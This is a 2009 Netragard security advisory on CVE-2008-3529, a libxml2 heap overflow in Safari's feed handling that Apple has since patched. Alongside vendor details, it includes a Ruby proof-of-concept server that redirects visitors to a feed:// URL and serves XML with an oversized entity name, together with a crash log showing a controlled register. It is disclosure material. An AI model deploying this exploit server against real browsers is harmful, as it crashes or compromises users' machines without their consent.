Netragard Security Advisory 2009-06-22

`*************************** NETRAGARD ADVISORY ************************  
http://www.netragard.com  
"The Specialist in Anti-   
Hacking"  
  
[Advisory Summary]  
---------------------------------------------------------------------------------------------------  
Advisory Author : Adriel T. Desautels  
Researcher : Kevin Finisterre  
Advisory ID : NETRAGARD-20090622  
Product Name : Mac OS X Publication Subscription  
Product Version : < Safari 3.2.3  
Vendor Name : http://www.apple.com  
Type of Vulnerability : Buffer Overflow  
Impact : Arbitrary Code Execution  
Vendor Notified : Yes  
Patch Released : APPLE-SA-2009-05-12  
Discovery Date : 08/2008  
  
[POSTING NOTICE]  
---------------------------------------------------------------------------------------------------  
If you intend to post this advisory on your web-site you must provide  
a clickable link back to http://www.netragard.com as the contents of  
this advisory may be updated without notice.  
  
[Product Description]  
---------------------------------------------------------------------------------------------------  
Now your favorite web browser is also the fastest on any platform. With  
page load speeds that outperform every other major browser on the Mac  
or PC, Safari also introduces a few new features to the mix.  
  
Thanks to the built-in RSS reader in Safari, you can scan the latest  
news, information, and articles from thousands of websites in one  
simple-to-read, searchable article list that Safari assembles for you.  
The first browser to feature a built-in RSS reader, Safari is the  
ideal way to browse the entire web without using a second application.  
  
Introduced in Mac OS X v10.5, Publication Subscription is a technology  
that offers developers a way to subscribe to web feeds from their  
applications. Web feeds are documents that contain frequently updated  
information. You can use Publication Subscription to allow your  
applications to subscribe to podcasts, photocasts, and any other  
feed-based document. Publication Subscription handles all the feed  
downloads and updates automatically. Publication Subscription  
technologies make use of libxml2 in order to parse RSS data.  
  
Libxml2 is the XML C parser and toolkit developed for the Gnome  
project (but usable outside of Gnome), it is free software available  
under the MIT License. XML itself is a metalanguage used to design  
markup languages, i.e. text language where semantic and structure  
are added to the content using extra "markup" information enclosed  
between angle brackets.  
  
[Technical Summary]  
---------------------------------------------------------------------------------------------------  
"The 'libxml' library is prone to a heap-based buffer-overflow  
vulnerability because the software fails to perform adequate boundary  
checks on user-supplied data.  
  
An attacker can exploit this issue to execute arbitrary within the  
context of an application using the affected library. Failed exploit  
attempts will result in a denial-of-service vulnerability."  
  
-- http://www.securityfocus.com/bid/31126  
  
Safari uses the vulnerable libxml library and can be attacked via  
the feed:// input vector.  
  
  
[Technical Details]  
----------------------------------------------------------------------------------------------------  
Libxml2 is vulnerable to a heap-based buffer overflow, caused by  
improper bounds checking in the xmlParseAttValueComplex() function. By  
parsing exceedingly long XML entity names using Libxml2, a remote  
attacker can overflow a buffer and execute arbitrary code on the system.  
If code execution fails a Denial of Service condition may happen.  
  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529  
  
https://bugzilla.redhat.com/show_bug.cgi?id=461015  
http://rhn.redhat.com/errata/RHBA-2008-0878.html  
https://bugzilla.redhat.com/show_bug.cgi?id=460396  
  
[Proof Of Concept]  
---------------------------------------------------------------------------------------------------  
The following testcases allowed for the creation of the below PoC  
  
https://bugzilla.redhat.com/attachment.cgi?id=315476  
https://bugzilla.redhat.com/attachment.cgi?id=315477  
https://bugzilla.redhat.com/attachment.cgi?id=315478  
https://bugzilla.redhat.com/attachment.cgi?id=315479  
https://bugzilla.redhat.com/attachment.cgi?id=315480  
https://bugzilla.redhat.com/attachment.cgi?id=315481  
https://bugzilla.redhat.com/attachment.cgi?id=315482  
  
#!/usr/bin/ruby  
#  
# The application PubSubAgent quit unexpectedly.  
#  
# Process: PubSubAgent [3764]  
# Path: /System/Library/Frameworks/PubSub.framework/   
Versions/A/Resources/PubSubAgent.app/Contents/MacOS/PubSubAgent  
# Identifier: PubSubAgent  
# Version: ??? (???)  
# Code Type: X86 (Native)  
# Parent Process: launchd [282]  
#  
# Date/Time: 2008-10-31 15:31:41.355 -0400  
# OS Version: Mac OS X 10.5.5 (9F33)  
# Report Version: 6  
#  
# Exception Type: EXC_BAD_ACCESS (SIGSEGV)  
# Exception Codes: KERN_INVALID_ADDRESS at 0x0000000005050500  
#  
# Thread 0 crashed with X86 Thread State (32-bit):  
# eax: 0x41414141 ebx: 0x94580535 ecx: 0x00136150 edx: 0x05050500  
# edi: 0x00007000 esi: 0x00100000 ebp: 0xbfffe298 esp: 0xbfffe220  
# ss: 0x0000001f efl: 0x00010206 eip: 0x94580605 cs: 0x00000017  
# ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037  
# cr2: 0x05050500  
  
require 'webrick'  
include WEBrick  
  
XML_LOVE =  
'<?xml version="1.0"?>' + "\n" +  
'<!DOCTYPE longentity [' + "\n" +  
'<!ELEMENT longentity (#PCDATA)>' + "\n" +  
'<!ENTITY ' +  
"A" * 1000 + " " +  
'"ha"> ]>' + "\n" +  
'<longentity location="&' +  
"A" * 1000 +  
';">text</longentity>' + "\n"  
  
REDIR_LOVE =  
'<meta http-equiv="REFRESH" content="0;url=feed://' + ARGV[0] + '/pwn">'  
  
s = HTTPServer.new( :Port => 80 )  
  
class REDIRECT < HTTPServlet::AbstractServlet  
def do_GET(req, res)  
res.body = REDIR_LOVE  
res['Content-Type'] = "text/html"  
end  
end  
  
class XMLLOVER < HTTPServlet::AbstractServlet  
def do_GET(req, res)  
res.body = XML_LOVE  
res['Content-Type'] = "text/xml"  
end  
end  
  
s.mount("/", REDIRECT)  
s.mount("/pwn", XMLLOVER)  
  
trap("INT"){ s.shutdown }  
s.start  
  
[Fix]  
---------------------------------------------------------------------------------------------------  
https://bugzilla.redhat.com/attachment.cgi?id=315291  
http://lists.apple.com/archives/security-announce/2009/May/msg00000.html  
  
[Vendor Status]  
---------------------------------------------------------------------------------------------------  
Vendor Notified  
  
[Vendor Comments]  
---------------------------------------------------------------------------------------------------  
Safari 3.2.3 is now available and addresses the following:  
  
libxml  
CVE-ID: CVE-2008-3529  
Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11,  
Mac OS X v10.5.7, Mac OS X Server v10.5.7, Windows XP or Vista  
Impact: Visiting a maliciously crafted website may lead to an  
unexpected application termination or arbitrary code execution  
Description: A heap buffer overflow exists in libxml's handling of  
long entity names. Visiting a maliciously crafted website may lead to  
an unexpected application termination or arbitrary code execution.  
This update addresses the issue through improved bounds checking.  
Safari 3.2.3 is included in the Mac OS X v10.5.7 update. Safari 3.2.3  
on Mac OS X requires either Mac OS X v10.5.7, or Mac OS X v10.4.11  
with Security Update 2009-002 installed.  
  
[Disclaimer]  
---------------------------------------------------------------------------------------------------  
Netragard, L.L.C. assumes no liability for the use of the information  
provided in this advisory. This advisory was released in an effort to  
help the I.T. community protect themselves against a potentially  
dangerous security hole. This advisory is not an attempt to solicit  
business.  
  
<a href="http://www.netragard.com>  
http://www.netragard.com  
</a>  
`